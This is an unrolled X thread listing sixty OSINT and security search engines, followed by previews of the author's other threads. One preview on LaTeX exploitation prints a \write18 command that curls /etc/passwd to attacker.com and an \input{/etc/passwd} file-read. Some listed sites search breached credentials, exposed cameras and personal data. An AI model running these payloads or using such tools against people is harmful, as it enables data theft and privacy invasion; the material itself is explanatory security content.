0b1d1 Profile picture
Jul 15 20 tweets 16 min read Read on X
✅ 60 Search Engines for Hackers, OSINT Analysts & Cybersecurity Pros
Explore, analyze, uncover legally and ethically.

Well Categorized ⤵️💯 Image
Whether you’re digging for vulnerabilities, tracing digital footprints, or conducting threat intel, these search engines unlock layers of the internet you can’t reach through Google alone.
🔬 Recon & Vulnerability Discovery
1.🔎 Google — google.com
2.🛰️ Shodan — shodan.io
3.🌐 Censys — censys.io
4.🔭 ZoomEye — zoomeye.org
5.🧱 GreyNoise — greynoise.io
6.🚀 FOFA — fofa.info
.
7.🧿 Onyphe — onyphe.io
8.🗂️ NIST NVD — nvd.nist.gov
9.🧬 osv.devosv.dev
10.📊 VulnIQ — vulniq.com
11.⚙️ VulDB — vuldb.com
12.🧨 0day.today0day.today
13.📘 OpenCVE — opencve.io
14.💣 ExploitDB — exploit-db.com
15.🧩 Rapid7 DB — rapid7.com/db
16.🔔 Vulmon — vulmon.com
.
17.🌪️ Chaos (ProjectDiscovery) — chaos.projectdiscovery.io
18.🕹️ FullHunt — fullhunt.io
19.🧪 Tria.getria.ge
20.🧫 malapi.iomalapi.io
🧭 Certificates, DNS & Infrastructure

21.📜 crt.shcrt.sh
22.🏗️ BuiltWith — builtwith.com
23.📡 RobTex — robtex.com
24.🧭 DNSdb — dnsdb.io
25.🧮 DNSViz — dnsviz.net
26.🕷️ C99.nlc99.nl
27.🛰️ Netlas — netlas.io
28.🧠 Recon.devrecon.dev
📶 Wireless & Geolocation Intelligence
29.🗺️ Wigle — wigle.net
30.📍 WiFiMap — wifimap.io
31.🛰️ WiFiSPC — wifispc.com
🧠 Static Code, File, and Tech Stack Discovery
32.🔠 SearchCode — searchcode.com
33.🔍 grep.appgrep.app
34.🧱 LOLBAS — lolbas-project.github.io
35.🛠️ GTFOBins — gtfo.mitre.org
36.🗃️ FileSec — filesec.io
37.🔡 NerdyData — nerdydata.com.
👥 People & Personal Data Search
38.🧑‍💼 Hunter.iohunter.io
39.🧠 Skymem — skymem.info
40.🧾 ThatsThem — thatsthem.com
41.🔐 Snusbase — snusbase.com
42.🕳️ Dehashed — dehashed.com
43.📞 Tellows — tellows.com
44.🧬 SpyDialer — spydialer.com
🌑 Deep Web / Darknet Indexing
45.🌘 Ahmia — ahmia.fi
46.🕸️ tor.linktor.link
47.🔮 ORKL — orkl.org
💧 Leak & Exposure Monitoring
48.🌊 LeakIX — leakix.net
49.🧰 Omnisint — omnisint.io
50.🕶️ SynapsInt — synapsint.com
51.🌀 Riddler — riddler.io.
52.🧷 Insecam — insecam.org
53.🪪 mylnikov — mylnikov.org
54.🔎 URLScan — urlscan.io
🌐 Alternative Web Search Tools

55.🔍 Bing — bing.com
56.🦆 DuckDuckGo — duckduckgo.com (suggested)
57.🕵️‍♂️ Startpage — startpage.com (suggested)
58.🌱 Mojeek — mojeek.com (suggested)
📚 Bonus Intelligence Resources
59.🧭 OSINT Framework — osintframework.com (structured reference)
60.🔗 Maltego Community — maltego.com (optional visual link mapper)
💡 Whether you’re in bug bounty recon, corporate investigations, or digital forensics having the right search tools can supercharge your workflow.
⚠️ Disclaimer: These tools are intended strictly for educational use and ethical security research. Always operate within legal scopes such as bug bounty programs, authorized assessments, or public datasets.

#OSINT #EthicalHacking #RandomRedGuy #RedTeam

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with 0b1d1

0b1d1 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @_0b1d1

Jul 15
🛰️ Building the Future with AI + Raspberry Pi

Next-Gen Surveillance, Recon, and Computer Vision in Your Hands

SHIT’ getting CRAZY 🤪

In a standout example of edge computing and DIY innovation, a cybersecurity and tech enthusiast has built a high-performance surveillance and tracking system powered entirely by a Raspberry Pi 5, paired with a Hailo AI HAT+ accelerator and a basic Pi 3 camera module
Despite its compact size, this setup is achieving results that rival commercial surveillance systems and it’s just getting started.
Read 13 tweets
Jul 13
📌 What is WebSocket?

WebSocket is a protocol that enables full-duplex, real-time communication over a single TCP connection unlike HTTP, which is one-way at a time.

⤵️Read This write up 💯⤵️ Image
Common use cases:
• Chat apps
• Live sports feeds
• Stock trading platforms
• Multiplayer games

🎯 Why Test WebSockets?
WebSockets often bypass traditional HTTP security controls like WAFs and CSRF protection. That makes them juicy targets for attackers
⚒️ WebSocket Pentesting Methodology

1. Discover WebSocket Endpoints
Use tools like:
• Burp Suite (WebSockets tab)
• Browser Dev Tools → Network → WS tab

Look for:
• ws://example.com/socket
• wss://secure.example.com/socket
Read 16 tweets
Jul 12
🐯 RedTiger-Tools is an open-source OSINT and penetration testing toolkit for ethical hackers and researchers. It streamlines recon and basic offensive tasks on both Linux and Windows.

⤵️GitHub Link 🔗 Below⤵️ Image
👨‍💻 Developer Info
Author: loxy0dev
Language: Python
Supported OS: Linux and Windows
🧰 Key Features

Network Scanning
•Website Vulnerability Scanner
•Website Info & URL Scanner
•IP Scanner
•Port Scanner
•Pinger
Read 10 tweets
Jul 9
🔁 Netcat (nc) Alternatives: Modern Tools for Pentesting & Networking 🛠️📡

Netcat is a legendary utility often dubbed the “Swiss Army knife of networking” used for reading and writing data across network connections. Image
Image
Image
Image
Image
Read 11 tweets
Jul 7
📌 📌 Hacking LaTeX: Hidden Threats in Plain Sight

LaTeX is known for academic papers and clean typesetting but in the wrong hands, it’s a stealthy exploit vector.
Platforms like Overleaf, Jupyter, and others that compile .tex files can unknowingly expose your system. Image
💥 1. Remote Code Execution (RCE) – \write18

If --shell-escape is enabled, LaTeX can run system commands:

\immediate\write18{curl `cat /etc/passwd`}

🧨 Leak data, fetch payloads, or execute arbitrary code at compile time.attacker.com/?data=
📂 2. Local File Inclusion (LFI)

LaTeX allows file inclusion using:
\input{/etc/passwd}

Without sandboxing, this can expose sensitive files on the host.
Read 9 tweets
Jul 5
🧿 Nmap Cheatsheet: Map the Network Before You Touch It 📡🔍

Whether you’re on offense or defense, Nmap is your recon sniper used by pentesters, blue teamers, and sysadmins to scan, fingerprint, and dig into networks before making a move. Image
🚀 What You Can Do with Nmap

🔍 Network Discovery
•Detect live hosts & open ports
•Identify IPs, MACs, and basic layout of the network

🧠 Service & Version Detection
•Know what’s running where
•Detect software versions to hunt known vulnerabilities
🧱 Firewall Evasion
•Use stealthy scan types (-sS, -sN, -f)
•Bypass basic firewalls and avoid IDS detection

💉 Vulnerability Scanning (NSE Scripts)
•Automate CVE checks, default creds, outdated services
•Run targeted scripts for SSL checks, SMB vulns, and more
Read 10 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(